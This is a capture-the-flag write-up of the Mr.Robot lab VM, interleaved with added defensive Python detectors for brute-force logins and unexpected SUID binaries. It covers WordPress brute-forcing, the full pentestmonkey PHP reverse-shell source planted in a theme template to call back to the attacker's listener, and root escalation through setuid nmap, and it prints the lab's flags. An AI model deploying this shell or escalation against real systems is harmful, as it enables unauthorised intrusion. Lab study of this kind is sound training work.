Mr.Robot target machine write-up
2022-05-19 13:42:16

Host discovery (other hosts on the internal network omitted)

Scan with arp-scan to discover the host, specifying the network interface (en0)

sudo arp-scan --interface=eth0 -l

xxx.xxx.xxx.xxx	00:0c:29:47:12:82	VMware, Inc.

Use nmap to gather service and OS information

sudo nmap -p- xxx.xxx.xxx.xxx -sV -vv -O

PORT    STATE  SERVICE  REASON         VERSION
22/tcp  closed ssh      reset   ttl 64
80/tcp  open   http     syn-ack ttl 64 Apache httpd
443/tcp open   ssl/http syn-ack ttl 64 Apache httpd

OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11

Visit port 80

The site turns out to be quite flashy.
Try directory scanning with dirb, which ships with Kali

dirb http://xxx.xxx.xxx.xxx/

http://xxx.xxx.xxx.xxx/0/

The site is found to be running WordPress 4.3.28

http://xxx.xxx.xxx.xxx/robots.txt (CODE:200|SIZE:41)

User-agent: *
fsocity.dic
key-1-of-3.txt

wget http://xxx.xxx.xxx.xxx/fsocity.dic

After downloading it, the file looks like a password dictionary.
A quick look shows many duplicate entries.

wc -l fsocity.dic

858160 fsocity.dic

Deduplicate it to produce new.dic

cat fsocity.dic|sort|uniq > new.dic

Counting the lines of new.dic shows far fewer

wc -l new.dic

11451 new.dic

Summary of reconnaissance results

Open ports known: 80, 443
CMS known: WordPress 4.3.28
A dictionary-like file obtained and deduplicated into new.dic
The key-1-of-3.txt page obtained
Admin login address:
http://xxx.xxx.xxx.xxx/wp-login.php

key1

Visiting the key-1-of-3.txt page reveals flag 1

key1:
073403c8a58a1f80d943455fb30724b9

Try brute-forcing the admin password

Testing shows that submitting a username and password on the login page returns a username error

Error: Invalid username.

Guessing that a correct username would instead return a password error, try brute-forcing the username

Brute-forcing usernames confirms the guess and yields three usernames

elliot
ELLIOT
Elliot

Then brute-force the password with these three usernames; all three return the same password

elliot  ER28-0652
ELLIOT  ER28-0652
Elliot  ER28-0652
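Seen from the server side, the enumerate-then-brute-force sequence above leaves a characteristic trace in the web server's access log: a burst of POST requests to wp-login.php from a single client. The following Python detector is an added example, not part of the original write-up; it assumes Apache combined-format log lines, and the sample lines, addresses and thresholds in it are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
# Apache "combined" format: client IP, identd, user, [timestamp], "request", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
# Constructed sample log (addresses made up): one client fires 30 POSTs at
# wp-login.php in 30 s; a normal user loads the form once and logs in once.
SAMPLE_LOG = [
    f'10.0.0.66 - - [19/May/2022:13:42:{i:02d} +0800] '
    f'"POST /wp-login.php HTTP/1.1" 200 3456 "-" "python-requests/2.27"'
    for i in range(30)
] + [
    '10.0.0.7 - - [19/May/2022:13:42:10 +0800] "GET /wp-login.php HTTP/1.1" 200 2211 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [19/May/2022:13:42:25 +0800] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

def parse_line(line):
    """Return (ip, timestamp, method, path, status), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), TS_FMT)
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))

def detect_login_bruteforce(lines, threshold=20, window=timedelta(minutes=1)):
    """Return {ip: peak_count} for clients exceeding `threshold` POSTs to
    wp-login.php within any sliding `window`.  Both the username-enumeration
    phase ("Invalid username") and the password phase answer HTTP 200 with the
    form re-rendered, so status is no signal; per-client request volume is."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3].split("?")[0].endswith("/wp-login.php"):
            posts[rec[0]].append(rec[1])
    flagged = {}
    for ip, times in posts.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:  # drop timestamps that fell out of the window
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            flagged[ip] = peak
    return flagged
```

A wordlist the size of new.dic (11451 entries) tried against one login form produces thousands of such POSTs in minutes, far beyond anything a person at a keyboard generates.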

Reverse shell to take control

Pick any page and upload a PHP reverse shell.
Here the 404 page template is edited to plant the shell,
and Kali listens on port 19999

nc -lvvp 19999


<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net

set_time_limit (0);
$VERSION = "1.0";
$ip = 'xxx.xxx.xxx.xxx'; // You have changed this
$port = 19999; // And this
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();

if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}

if ($pid) {
exit(0); // Parent exits
}

// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}

$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}

// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}

// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}

// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}

// Wait until a command is sent down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}

// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}

// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}

?>

Visiting http://xxx.xxx.xxx.xxx/0/404.php in a browser triggers the reverse shell

The shell has no TTY yet, so use Python to spawn an interactive one

python -c 'import pty; pty.spawn("/bin/bash")'

An interactive shell is obtained

$ python -c 'import pty; pty.spawn("/bin/bash")'
daemon@linux:/$

Privilege escalation

Look for escalation paths with find / -user root -perm /4000 2>/dev/null

find / -user root -perm /4000 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown

nmap is found and can be exploited; try escalating privileges through nmap

daemon@linux:/$ /usr/local/bin/nmap --interactive
/usr/local/bin/nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# whoami
root
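From the defender's side, the escalation above works only because a setuid-root nmap sits outside the set of SUID binaries the system legitimately ships with. The following Python audit is an added example, not part of the original write-up: it lists setuid-root files the way the find command above does and diffs them against a baseline; that baseline is an assumption derived from the write-up's output, not an authoritative list.

```python
import os
import stat

# Assumed baseline of setuid-root binaries a stock Debian/Ubuntu-style install
# ships with (taken from the write-up's find output, minus nmap and the VMware wrappers).
BASELINE = {
    "/bin/ping", "/bin/ping6", "/bin/mount", "/bin/umount", "/bin/su",
    "/usr/bin/passwd", "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/sudo", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/pt_chown",
}
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}  # pseudo-filesystems, only noise

def find_suid(root="/", owner_uid=0):
    """Python equivalent of `find / -user root -perm /4000`: sorted paths of
    regular files under `root` carrying the setuid bit and owned by `owner_uid`."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue  # unreadable entry, same effect as 2>/dev/null above
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID and st.st_uid == owner_uid:
                found.append(path)
    return sorted(found)

def unexpected_suid(found, baseline=BASELINE):
    """Setuid files outside the baseline. Each is an escalation candidate to
    review; for a tool like nmap the usual fix is `chmod u-s` or removal."""
    return sorted(set(found) - set(baseline))

if __name__ == "__main__":
    for path in unexpected_suid(find_suid("/")):
        print("unexpected SUID binary:", path)
```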

After escalating, use find to locate key1, key2 and key3

# find / -name "*key*.txt"
find / -name "*key*.txt"
/usr/share/perl/5.18.2/Unicode/Collate/keys.txt
/usr/share/perl/5.18.2/Unicode/Collate/allkeys.txt
/usr/share/doc/openssl/HOWTO/keys.txt
/root/key-3-of-3.txt
/opt/bitnami/apps/wordpress/htdocs/key-1-of-3.txt
/home/robot/key-2-of-3.txt

Read the keys

#cat /home/robot/key-2-of-3.txt
822c73956184f694993bede3eb39f959

#cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4

Sum-up

Port scan finds 80 and 443

Directory scan finds robots.txt > fsocity.dic, deduplicated > new.dic

The WordPress login page reveals whether a username is valid, allowing username enumeration and then brute-forcing of username and password with new.dic

Log in with Elliot / ER28-0652, upload a shell, and get a reverse shell back to the attacking machine

Spawn a TTY shell with Python

Search SUID binaries for an escalation path (nmap) > root, free rein

key1:073403c8a58a1f80d943455fb30724b9

key2:822c73956184f694993bede3eb39f959

key3:04787ddef27c3dee1ee161b21670b4e4